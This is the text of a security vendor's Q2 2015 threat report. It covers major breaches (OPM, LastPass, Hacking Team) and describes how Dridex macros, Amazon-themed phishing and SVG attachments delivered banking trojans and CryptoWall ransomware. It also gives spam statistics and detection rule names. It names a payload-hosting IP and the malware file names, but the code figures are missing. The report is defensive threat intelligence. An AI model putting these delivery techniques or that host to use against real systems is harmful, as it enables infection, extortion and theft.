What  We’ve  Seen  in  Q2  2015  

Malicious  and  unwanted  email  traffic  has  remained  steady  during  the  second  quarter  of  2015,  having  accounted  for  over  81  percent  of  all  traffic  as  seen  by  AppRiver  filters.  

The  second  quarter  of  2015  has  given  us  even  more  accounts  of  large  scale  breaches,  not  just  retailers,  but  by  password  management  companies  and  large  government  agencies.  According  to  the  Ponemon  Institute’s  2015  Global  Cost  of  Data  Breach  Study,  the  average  cost  of  each  one  of  these  breaches  has  reached  record  levels  of  $3.8  million.  Cyber  criminals  show  no  sign  of  slowing  down  as  these  attacks  against  single  high  value  targets  have  proven  much  more  lucrative  than  attacks  against  many  individual  targets,  not  to  mention  it  often  takes  less  effort  on  their  part.  

We  have  also  seen  the  continued  spread  of  malware  that  utilizes  effective  techniques  to  part  their  victims  from  their  money.  Ransomware  continues  to  encrypt  data  and  malicious,  though  seemingly  benign,  office  documents  carry  hidden  macros  that  steal  everything  in  sight.  

This  threet month  report  will  discuss  the  above  issues  as  we  have  seen  them  in  the  second  quarter.  In  addition,  we  will  share  metrics  as  seen  by  AppRiver’s  SecureTide™  and  SecureSurf™  filters  from  our  nodes  throughout  the  world.  We  will  point  out  recent  trends  in  email  and  Web  spam  and  malware  campaigns  and  share  some  insight  about  what  we  can  expect  in  the  second  half  of  the  year.  

Events  

Office  of  Personnel  Management  Data  Breach  

The  biggest  newsworthy  breach  in  the  second  quarter  of  2015  has  been  the  data  breach  involving  the  Office  of  Personnel  Management  (OPM).  The  OPM  is  responsible  for  keeping  records  of  current  and  former  government  workers,  as  well  as  process  things  like  payroll  and  performing  background  checks.  The  estimated  amount  of  people  affected  is  around  18  million.  While  we  have  seen  much  higher  breach  counts  of  data,  this  breach  is  particularly  disturbing  given  the  information  taken  and  the  fact  that  it  consists  of  all  government  

employees.  

Included  in  the  personal  data  stolen  are  financial  histories,  foreign  trips  taken,  current  and  past  residences,  names  of  neighbors/friends/coworkers/roommates/relatives,  and  social  security  numbers.  Since  the  OPM  handles  sensitive  information,  like  doing  background  checks  on  people  filing  for  security  clearances,  they  are  privy  to  all  of  that  information  during  an  investigation  for  approval.  While  this  breach  could  have  a  lot  of  information  that  may  be  public  (like  addresses  or  previous  places  of  work),  much  of  it  could  be  secrets  individuals  revealed  in  confidence  while  getting  clearance.  This  could  be  a  

treasure  of  data  for  anyone  looking  to  contact  and  phish  information  about  individuals  involved  in  the  breach,  or  worse,  to  blackmail  them  into  doing  something  illegal.  

So  far,  there  is  no  definitive  proof  of  who  orchestrated  this  breach,  but  the  government  is  saying  it  was  linked  to  a  hacking  group  based  in  China.  Of  course,  China  has  denied  any  such  claims.  The  US  also  says  there  is  evidence  linking  the  OPM  intrusion  to  one  earlier  in  the  year  that  involved  the  large  insurance  provider  Anthem.  

Most  people  have  an  expectation  that  when  their  data  stored  with  a  business,  it  is  going  to  be  secure,  even  more  so  when  it  is  stored  with  the  government.  Unfortunately,  this  was  a  very  large  government  breach  that  has  now  had  millions  of  personnel  records  stolen  from  it,  which  has  upset  millions  of  victims.  A  class  action  lawsuit  has  been  filed  against  the  OPM  by  those  affected.  A  key  point  to  see  in  the  filed  lawsuit  is  that  since  2007,  the  OPM  has  been  informed  by  its  Office  of  Inspector  General  that  there  were  serious  problems  in  their  cybersecurity,  and  allegedly  the  OPM  failed  to  take  any  action  on  those  issues.  If  this  is  indeed  the  case,  this  very  well  shows  why  no  company  should  ignore  security  risks  to  systems,  especially  for  years.  Even  if  it  is  a  flaw  or  hole  that  someone  may  think  will  never  be  found,  it  is  likely  it  will  indeed  eventually  be  discovered  and  exploited.  

 

Malicious  Macros  

The  malware  family  known  as  Dridex,  which  is  a  banking  Trojan  that  utilizes  email  to  spread,  has  been  very  busy  so  far  this  year.  Dridex  is  an  evolution  from  its  fellow  family  member  Cridex  which  mainly  lived  online,  waiting  for  victims  to  surf  past  a  website  that  it  inhabits  in  order  to  achieve  infections.  Apparently,  Dridex  got  sick  of  all  of  that  waiting  around  and  decided  to  email  itself  out  to  the  world.    

Dridex  has  been  very  fond  of  one  specific  technique  that  has  proven  very  successful—the  use  of  user  activated  macros  within  Microsoft  Word  and  Microsoft  Excel  documents.  By  default,  macros  are  disabled  in  Microsoft  products  since  Microsoft  has  recognized  the  inherent  danger  of  utilizing  said  functionality.  However,  a  great  number  of  offices  still  utilize  these  to  allow  documents  to  link  to  each  other  or  to  launch  automated  processes.  Almost  since  the  genesis  of  these  macros,  the  bad  guys  saw  an  easy  opportunity.  They  have  victims  run  their  attack  code  for  them  (without  their  knowledge)  by  attaching  the  code  to  actual  office  documents.  When  the  offending  attachment  is  opened,  the  recipient  is  prompted  to  enable  this  functionality  which  will  allow  the  malicious  code  to  run,  downloading  the  payload  from  a  remote  server.  Even  though  this  technique  requires  a  few  more  steps  to  actually  infect  its  targets,  it  seems  a  good  amount  of  people  have  no  qualms  about  seeing  it  through  to  fruition  as  Dridex  shows  no  real  signs  of  slowing  down.  This  is  also  a  sign  that  their  technique  is  working.  

The  themes  of  these  malicious  emails  vary,  but  are  the  emails  themselves  are  usually  rather  short  in  content,  while  underneath  the  hood,  the  malicious  codes  lie  in  waiting.  Sometimes,  this  code  can  be  seen  in  plaintext  when  analyzing  the  malicious  attachments,  but  often  the  bad  guys  

will  obfuscate  the  code  in  order  to  hide  its  true  intentions.  Decimal  and  Base64  encoding  have  been  a  favorite  of  theirs,  as  can  be  seen  in  the  example  below.  

 

This  code  from  a  Dridex  campaign  this  year  was  used  to  hide  a  much  shorter  VBS  command  once  it  was  decoded:  

 

As  can  be  seen  in  the  example  above,  this  concealed  macro  was  designed  to  download  the  malicious  payloads  “dfsdfff.exe”  and  “ddls.gif”  from  the  IP  91.215.138.84.  As  is  also  usual,  the  IP  that  hosts  the  payloads  will  change  on  a  campaign  by  campaign  basis  and  will  only  stay  responsive  for  a  short  period  of  time  before  moving  on  to  the  next.  

It  is  highly  recommended  to  avoid  enabling  macros  in  your  office  software  as  this  is  often  the  only  security  barrier  in  the  way  of  the  attackers  and  victims.    

 

Amazon  Themed  Malware  Targets  Crypto  Currencies    

During  June,  we  witnessed  an  attack  posing  as  legitimate  Amazon  purchase  confirmations  again  attempting  to  leverage  the  use  of  macros  in  Word  documents  to  infect  their  victims.  This  malware  would  attempt  to  steal  account  credentials  for  a  lengthy  list  of  FTP  and  multiple  file  storage  programs  as  well  as  various  passwords  from  infected  machines,  such  as  those  for  MS  Outlook  and  installed  browsers  such  as  Firefox,  IE,  Opera  and  Chrome.  In  addition  to  these,  however,  it  would  then  begin  pilfering  the  target  machine  for  just  about  every  type  of  Crypto  currency  in  existence.  Including:  

 

This  behavior  (stealing  Crypto  currency)  is  something  we  have  been  seeing  with  more  frequency  lately.  The  anonymous  nature  and  lack  of  regulation  in  the  Crypto  currency  market  make  it  more  akin  to  stealing  actual  cash  than  to  committing  wire  fraud  by  raiding  someone’s  online  bank  accounts.  But  in  this  case,  the  cybercriminals  are  fine  with  that  too.  

 

LastPass  Master  Passwords  Pi l fered  

On  June  15,  2015,  the  secure  password  management  company  LastPass  started  informing  users  of  a  data  breach.  The  breach  of  LastPass  data  is  concerning  to  most  people  since  security  and  passwords  are  the  company’s  cornerstone.  Some  of  the  data  stolen  during  the  breach  included  email  addresses  of  users,  password  reminders,  and  authentication  hashes.  While  this  is  very  concerning  data,  possibly  the  worst  part  to  hear  for  users  was  that  their  master  password  hashes  had  been  taken.  LastPass  did  assure  users  that  their  password  vaults  were  not  taken  (the  vault  contains  all  of  the  stored  passwords  that  were  saved  by  the  user),  but  as  any  LastPass  user  knows,  having  the  master  password  means  you  could  gain  access  to  everything.  Fortunately,  LastPass  actually  uses  a  strong  protection  of  the  master  passwords  by  using  “a  random  salt  and  100,000  rounds  of  server-­‐side  PBKDF2-­‐SHA256,  in  addition  to  the  rounds  performed  client-­‐side.”    While  this  is  a  nice  thing  to  be  reassured  by,  it  was  still  recommended  everyone  change  their  master  passwords  and  look  in  to  using  two-­‐factor  authentication.  

 

 

CryptoWall  Hides   in  Vector   Images  

Ransomware  has  made  a  brand  new  name  for  itself  since  the  latter  half  of  2013,  thanks  to  new  techniques  utilized  by  the  Crypto-­‐style  families  of  malware  that  have  become  very  aggressive  recently.  It  all  began  with  Cryptolocker  and  its  spinoffs,  CryptoWall  and  CryptoDefense,  who  made  their  first  appearances  around  September  of  2013.  This  family  of  malware,  referred  to  as  ransomware,  is  malicious  software  that  demands  the  payment  of  a  ransom  in  exchange  for  the  return  of  access  to  the  victim’s  computer  or  files.  Even  though  this  technique  has  been  around  since  the  late  80s,  most  of  them  did  not  create  such  a  panic  as  Cryptolocker  has  since  most  were  easily  subverted.  Cryptolocker,  however,  employed  strong  encryption  to  scramble  nearly  every  file  on  its  target’s  computer  and  made  them  impossible  to  recover  without  the  unique  private  key  used  to  encrypt  them.  Even  if  the  Cryptolocker  infection  was  successfully  removed,  the  files  would  remain  encrypted  and  unusable.  This  instantly  made  many  of  its  victims  aware  of  the  importance  of  a  reliable  backup  strategy.  

In  May  of  this  year,  we  began  to  see  a  CryptoWall  variant  hiding  somewhere  that  we  had  not  seen  before,  inside  of  vector  graphics  files.  It  began  as  an  email  campaign  that  contained  zipped  SVG  files  attached  in  the  messages.  SVG  files  are  normally  used  for  images  and  support  some  interactive  features,  like  a  graph  on  a  webpage  that  displays  information  when  the  cursor  hovers  over  an  option.  These  SVG  files,  however,  contained  a  small  JavaScript  entry  that  would  open  a  webpage  to  download  its  payload.  

 

The  IP  link  in  the  image  ended  up  forwarding  to  another  domain  where  a  zip  was  downloaded  of  the  actual  EXE  payload.  However,  it  did  not  auto  execute;  user  interaction  was  still  needed  for  that.  The  payload  this  time  just  happened  to  be  CryptoWall.  When  the  file  was  finally  executed,  it  created  HELP_DECRYPT.TXT,  HELP_DECRYPT.PNG,  HELP_DECRYPT.HTML,  and  HELP_DECRYPT.URL  files  that  have  all  been  associated  with  CryptoWall  infections.  It  also  created  a  public  RSA  key  and  entered  it  in  to  the  registry  (the  key  used  with  encrypting  the  files).  After  giving  it  just  a  few  minutes,  indeed  the  popup  about  CryptoWall  3.0  popped  up  with  steps  on  how  to  pay.    

Crypto  ransomware  has  proven  many  times  it  is  effective  for  attackers  in  getting  users  to  actually  pay  the  ransom.  The  tactic  is  still  alive  and  likely  to  continue  evolving.  With  the  attacks  still  being  prevalent,  it  is  a  good  idea  to  make  sure  you  are  covered  with  data  backups  that  cannot  be  potentially  accessed  by  the  malware  (it  has  been  known  to  encrypt  network  shares  and  NAS  units).  

Another  interesting  bit  of  information  that  we  noticed  while  looking  at  the  EXE  that  was  downloaded  was  that  it  had  SQL  commands  hard  coded  in  it.  Looking  closer,  they  all  seemed  related  to  a  potential  school’s  SQL  database.  Some  of  the  recipients  we  stopped  this  malware  for  were  schools,  but  nothing  seemed  out  of  the  ordinary  with  the  volume  of  recipients,  which  was  low  volume  in  general.  While  it  is  possible  the  malware  had  other  intentions  from  encrypting  in  mind,  like  to  wreak  havoc  in  a  SQL  database,  this  was  from  a  strings  output  so  it  was  all  plain  text  and  the  table  naming  conventions  just  seem  a  little  too  plain  as  well.  However,  someone  who  knows  SQL  table  names  or  a  school  using  a  plain  naming  convention  could  be  problematic  if  the  malware  were  to  attempt  to  attain  access  and  do  its  thing.  It  is  certainly  also  a  tactic  for  malware  authors  to  add  in  code  that  is  not  used  or  code  that  fluffs  up  functions  to  distract  from  analysis  and  make  analyzing  more  complex  and  time  consuming.  While  these  appeared  to  be  part  of  valid  functions,  it  looks  like  they  were  not  used  during  testing.  Although,  it  is  possible  there  were  very  specific  parameters  that  needed  to  be  met  for  this  to  go  active  and  attempt  SQL  changes.  

 

 

Hacking  Team  Data  Dump  

The  most  recent  data  breach  to  hit  the  headlines  lately  has  been  of  the  huge  amount  of  data  taken  from  a  security  firm  called  Hacking  Team.  The  Milan,  Italy-­‐based  company  is  primarily  focused  in  selling  software  to  government  and  private  agencies  that  allows  them  to  remotely  access  computers  and  devices.  Yes,  they  essentially  created  and  sold  spyware  to  governments.  They  had  specifically  designed  software  to  allow  this  remote  access  to  devices  like  cell  phones  and  personal  computers,  as  well  as  knowledge  of  zero-­‐day  exploits  they  could  use.  On  July  5,  2015,  400  GB  of  their  data  was  released  on  the  Internet  for  people  to  torrent,  including  emails,  invoices,  and  source  code.    

The  zero-­‐day  exploit  leaked  in  the  documents  that  Hacking  Team  knew  about  was  for  Adobe  Flash.  Since  the  documents  leaked  had  detailed  information  on  the  exploit,  malware  authors  were  able  to  quickly  take  advantage  of  the  exploit  and  start  delivering  malware  like  CryptoWall  to  browsers  online.  The  Adobe  exploit  was  referred  to  in  the  leaked  documents  as  “the  most  beautiful  flash  bug  in  the  last  four  years”  by  Hacking  Team.  Adobe  is  already  scheduled  to  get  an  immediate  fix  out  for  it,  but  now  that  it  is  out  in  the  wild,  malware  authors  may  be  in  a  rush  to  take  advantage  of  it  before  it  is  fixed.  

The  actual  hack  of  data  is  being  claimed  done  by  “PhineasFisher”  which  is  the  same  hacker  who  was  involved  with  the  data  breach  for  Gamma,  another  cybersecurity  company  that  sold  software  to  governments  for  spying  (FinFisher).  This  obviously  leads  a  person  to  wondering  who  is  behind  it  and  

what  motivates  him.  Whether  it  be  hacktivism,  money,  or  even  a  competitor,  “PhineasFisher”  has  already  announced  that  these  two  are  down  but  there  are  more  to  go.  

 

 

 

Metrics    

Traff ic  by  Region  This  chart  represents  region  of  origin  for  spam  as  detected  by  AppRiver  filters.  Spam  originating  from  North  America  overtook  Europe  in  2014  and  continued  to  expand  its  share  in  the  first  half  of  2015.  North  America  and  Europe  are  now  accounting  for  seventy-­‐eight  percent  of  the  spam  traffic  we  see.  

 

 

 

Spam  by  Country  This  chart  represents  the  top  countries  from  which  spam  originated  during  2015’s  second  quarter.  The  US  remained  the  top  point  of  origin  for  spam  as  it  was  the  point  of  origin  for  nearly  2.6  billion  spam  and  malicious  emails  throughout  the  second  quarter.  Spam  emanating  from  the  US  has  now  increased  for  the  fourth  consecutive  quarter.  

 

 

Spam  Traff ic  This  chart  displays  spam  traffic  throughout  the  second  quarter  of  2015.  Spam  traffic  decreased  slightly  from  the  first  quarter.  While  most  days  spam  volumes  were  around  40-­‐50  million  messages  per  day,  there  were  several  large  traffic  spikes  where  spam  volume  increased  by  300  percent  or  more  over  the  previous  day.  In  all  we  quarantined  roughly  4.7  billion  spam  messages  in  the  second  quarter.  

 

 

Virus  Traff ic  This  chart  displays  virus  traffic  from  the  second  quarter  of  2015.  Malware  distribution  was  steady  as  we  quarantined  165  million  messages  with  virus  attachments.  

 

 

Top  Email  Virus  Threats  These  are  the  top  20  malware  threats  we  saw  in  June  2015  in  order  of  frequency,  with  the  most  frequent  appearing  at  the  top.  The  virus  names  that  begin  with  "X."  signify  rules  that  were  written  by  AppRiver  analysts  (this  does  not  mean  that  other  anti-­‐virus  vendors  did  not  eventually  have  definitions  in  place  for  these  viruses;  it  simply  means  that  AppRiver  often  had  protection  in  place  before  any  of  them).  

Top  Email  Virus  Threats  • X.MrinvBasic.exe  • X.HeurFXexeBSc.exe  • X.BadMacAOa_b.doc  • X.W32Troj.patre.zip  • X.HeurFXexeBSa.exe  • X.Suspw18IMp.exe  • X.HeurNMQ.exe  • X.BDexYR.heurB.exe  • X.MSW.Mac.DLfile.100114a  • X.YTBNscr.zip  • X.HurGenMalNMF.zip  • X.W32.Bredolab.pak  • X.SuspBDimpGTP.exe  • X.SuspImMal.RAb.exe  

• X.MysVM.bdis.exe  • X.HeurNMK.exe  • X.GenMalth26YSI.zip  • X.W32.Ramnit.lc  • X.HeurNMC.exe  • X.MrinvBasicB.exe